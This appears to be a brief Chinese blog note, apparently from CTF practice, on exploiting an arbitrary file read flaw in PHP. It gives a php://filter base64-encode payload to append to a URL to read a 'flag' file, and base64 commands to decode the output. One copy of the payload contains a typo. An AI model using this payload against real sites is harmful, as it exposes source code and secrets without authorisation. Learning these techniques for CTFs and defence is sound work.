任意文件读取漏洞

使用方法php://filter/read=convert.base64-encode/resource=xxx

任意文件读取漏洞  php://filter/read=convert.base64-encode/resource=flag

                        在url后边接上

以base64的编码形式 读取flag里面的内容

php://filter/read=convert.base64=encode/resource=flag

用kali来解码

创建一个文件

把需要解码的内容放入文件 

base64 -d 文件

编码

base64 文件

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-13 12:24:03       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-13 12:24:03       101 阅读
  3. 在Django里面运行非项目文件

    2023-12-13 12:24:03       82 阅读
  4. Python语言-面向对象

    2023-12-13 12:24:03       91 阅读

热门阅读

  1. conda使用教程

    2023-12-13 12:24:03       56 阅读
  2. 笔记本电脑IP地址:探寻隐匿的数字通行证

    2023-12-13 12:24:03       54 阅读
  3. CentOS7安装Docker

    2023-12-13 12:24:03       60 阅读
  4. 声明式编程Declarative Programming

    2023-12-13 12:24:03       56 阅读
  5. mysql分页的原理、php实现分页

    2023-12-13 12:24:03       63 阅读
  6. Vue学习笔记-Vue3中ref和reactive函数的使用

    2023-12-13 12:24:03       62 阅读